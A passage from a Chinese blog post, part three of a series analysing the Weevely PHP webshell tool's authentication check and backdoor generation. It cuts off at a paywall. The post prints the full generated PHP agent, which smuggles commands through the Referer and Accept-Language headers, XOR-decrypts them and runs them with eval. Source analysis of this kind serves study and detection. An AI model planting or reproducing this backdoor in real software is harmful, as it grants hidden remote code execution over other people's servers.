Weevely使用及源码分析(三)

最新推荐文章于 2022-08-21 10:54:18 发布
最新推荐文章于 2022-08-21 10:54:18 发布
阅读量1.7k 收藏
点赞数 2
分类专栏: Weevely 文章标签: weevely php 后门 源码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaofeiNO1/article/details/54409692
版权

1 weevely验证机制分析

1.1 源码分析

   当生成的php文件是以stegaref_php.tpl文件为模板时,当我们在连接时的命令行中输入任意命运就可以触发php.py文件中的_check_interpreter()函数,_check_interpreter()函数主要功能是随机生成一个命令,”echo”一个从11111到99999大小的随机整数,然后分别调用channels文件夹下的channel.py文件中的”send()”函数,然后在send()函数中把payload分别发送给legacycookie.py,legacyreferrer.py和stegaref.py三个Python文件中的”send()”函数同时返回Response,code,error的值, response, code, error = channel.send(command),通过对返回的Response和构造的echo的随机数是否相等来进行判断PHP shell能否直接运行,同时判断连接是否成功。

1.2 PHP(stegaref_php.tpl模板)后门文件分析

   首先,当我们使用命令:weevely generate hello /var/www/html/testformd.php来生成木马文件时,会调用generate()函数来生成木马。

  1. generate()函数在weevely3-master/core/generate.py文件中,函数原型为: def generate(password, obfuscator = 'obfusc1_php', agent = 'stegaref_php'):其中,password为用户指定的密码, obfuscator是使用的webshell模糊变换模板,agent为webshell的模板,后两个参数均可自己定义,用户可以自己编写自定义的模板放入weevely3-master/bd/obfuscator/和weevely3-master/bd/agent/目录下,然后命令中指定自定义的模板。
  2. agent = Template(open(agent_path,'r').read()).render(password=password)render agent模板文件,得到原始的webshell。webshell源码通过pycharm debug出来,生成的源码为:
 $kh="5d41";
        $kf="402a";

        function x($t,$k){
            $c=strlen($k);
            $l=strlen($t);
            $o="";
            for($i=0;$i<$l;){
                for($j=0;($j<$c&&$i<$l);$j++,$i++)
                {
                    $o.=$t{
  $i}^$k{
  $j};
                }
            }
            return $o;
        }

        $r=$_SERVER;
        $rr=@$r["HTTP_REFERER"];
        $ra=@$r["HTTP_ACCEPT_LANGUAGE"];

        if($rr&&$ra){
            $u=parse_url($rr);
            parse_str($u["query"],$q);
            $q=array_values($q);
            preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);

            if($q&&$m){
                @session_start();

                $s=&$_SESSION;
                $ss="substr";
                $sl="strtolower";

                $i=$m[1][0].$m[1][1];
                $h=$sl($ss(md5($i.$kh),0,3));
                $f=$sl($ss(md5($i.$kf),0,3));

                $p="";
                for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];

                if(strpos($p,$h)===0){
                    $s[$i]="";
                    $p=$ss($p,3);
                }

                if(array_key_exists($i,$s)){

                    $s[$i].=$p;

                    $e=strpos($s[$i],$f);
                    if($e){
                        $k=$kh.$kf;
                        ob_start();
                        @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
                        $o=ob_get_contents();
                        ob_end_clean();
                        $d=base64_encode(x(gzcompress($o),$k));
                        print("<$k>$d</$k>");
                        @session_destroy();
                    }
                }
            }
        }
  1. minified_agent = utils.code.minify_php(agent)对原始的webshell进行”净化”操作,去除里面”\n\t”等特殊字符。处理完的源码为:
$kh=
最低0.47元/天 解锁文章
fly小灰灰
关注
专栏目录
使用weevely获取系统内容.docx
11-30
"使用 Weevely 获取系统内容" Weevely 是一个基于 Web 的后门生成工具,主要用于渗透测试和安全评估。在本文档中,我们将详细介绍如何使用 Weevely 获取系统内容,包括实验准备、实验过程、渗透后 OWASP 系统应用等...
【webshell管理工具之二】weevely
redwand的博客
05-09 2542
weevely是kali下集成的一款很好用的专门针对php语言的webshell管理工具,其加密的数据传输和易于操控的特性广受渗透测试们的喜爱。
Weevely
Nixawk
07-31 2008
Weevely 出现已经有一段时间了, 今天
图解WildFly8之Servlet容器Undertow剖析
Vince的修炼之路
04-28 8144
WildFly8的默认Servlet容器采用的不是Tomcat,也不是Jetty,而是JBoss自己开源的Undertow,Undertow是用Java编写的性能灵活的Servlet容器,底层基于高性能的NIO框架XNIO,XNIO也是JBoss开源的产品,JBoss开源的高性能NIO框架还有一个很有名:Netty。Undertow在WildFly8中的角色如图: Undertow的架构
入侵检测——weevely
LainWith的博客
08-26 650
这里写目录标题介绍使用环境生成webshell上传webshell连接webshell命令执行编写规则4.0.1版本1.1版本规则参考 介绍 Weevely工具Python语言编写,集生成木马与加连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,已经加入Kali豪华大礼包中。在Kali1.0中集成的低版本V1.1更是功能强大,支持图片与.htaccess两种绕过方式。新版本中将这两种功能阉割掉了,但是生成的木马文件仍然进行了加密处理。 ​ 在实操过程中发现,使用weevely生成的webshe
Weevely使用源码分析(一)
fly小灰灰的专栏
01-30 2536
1. 简介 1.1 前言    weevely 是一款使用python编写的webshell工具(集webshell生成和连接于一身),采用C/S模式构建,可以算作是linux下的一款菜刀替代工具(限于PHP),具有很好的隐蔽性,在Linux下具有: 服务器配置审计 后门放置 暴力破解 文件管理 资源搜索 网络代理 命令执行 系统信息收集 端口扫描等功能 1.2 测试环境
weevely3.3.1:Weevely旧版本(3.3.1)
03-25
韦韦利Weevely是一个命令行Web Shell,可在运行时通过网络动态扩展,旨在用于远程管理和渗透测试。 它提供了一个类似ssh的终端,即使在受限的环境中,也只需将PHP脚本拖放到目标服务器上。 低资源占用的代理程序和30...
weevely3:武器化的Web外壳
04-05
Weevely-武器化的Web Shell 用法 weevely generate <password> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标...
Weevely中PHP加密模块
01-26
分析`weevely_Encryption`源代码能提供深入的理解,关于如何在PHP中实现加密功能,以及Weevely如何在实际操作中使用这些技术。这对于提高个人技能或开发类似工具非常有帮助。 总的来说,Weevely的PHP加密模块是其...
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
02-06
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
Shelly:带Python的简单后门管理器(基于weevely)
02-05
雪莉| 使用Python的简单后门管理器(基于weevely) Shelly是使用Python编写的简单工具,其功能是远程访问网站 安装: $ git clone $ cd雪莉$ python3 shell.py 要求 : sudo pip install -r requirements.txt 范例: python3 shell.py -g wp-log -p tegal1337 ______ ____ / __/ / ___ / / __ __ _\ \/ _ / -_/ / / // / /___/_//_\__/_/_/\_, /
Weevely使用源码分析(二)
fly小灰灰的专栏
01-30 2827
1. 定义(术语、名词解释)    客户端:运行Weevely进程的计算机。    服务端:存有PHP木马的服务器。 2. 协议交互流程    在客户端,Weevely每执行一条命令就通过HTTP协议发出一条GET/POST请求;在服务端,木马针对每条GET/POST请求作出响应,产生一条响应包。 3. 数据包及源码分析    通过对源代码进行走读以及wireshark进行抓包分
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 4636
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP
yggcwhat
05-02 2156
weevely的webshell分析以及冰蝎/蚁剑免杀-PHP
weevely工具使用
淡巴枯的博客
05-23 6748
weevely工具使用 目录一. 关于weevely二. 安装weevely使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
Weevely工具使用详解 (Linux菜刀)
weixin_45116657的博客
04-10 2816
一、下载与安装 下载地址:https://github.com/epinna/weevely3 下载之后解压,使用里面的weevely.py 在kali中国 ...
PHP后门生成工具weevely分析
代码析构师的专栏
05-15 2358
唐门少 发表于 2012-10-19 11:07 最近闲的蛋疼,玩了下weevely这个工具,感觉还是蛮强大的,防查杀,连接也是加密的。感兴趣的朋友看正文吧。 0x01 摘要 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web
Array 原型方法源码实现大解密
chern1992的博客
06-17 250
引言 几个常用数组方法的使用方式已经在【进阶 6-1 期】中介绍过了,今天这篇文章主要看看 ECMA-262 规范中是如何定义这些方法的,并且在看完规范后我们用 JS 模拟实现下,透过源码探索一些底层的知识,希望本文对你有所帮助。 #Array.prototype.map 完整的结构是Array.prototype.map(callbackfn[, thisArg]),map函数接收两个参数,一个是必填项回调函数,另一个是可选项 callbackfn 函数执行时的 this 值。 map方法...
html代码大全(很全的)_分享一些比较强悍的PHP木马大全源码
weixin_39550172的博客
11-27 2421
由于PHP一句话木马可以说有很多,简单的、中等的、复杂的.......,今天主要是分享一些比较强悍的一些PHP一句话木马大全;一、利用404页面隐藏PHP小马<html><head><title>404 Not Foundtitle>head><body><h1>Not Foundh1><p>The...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值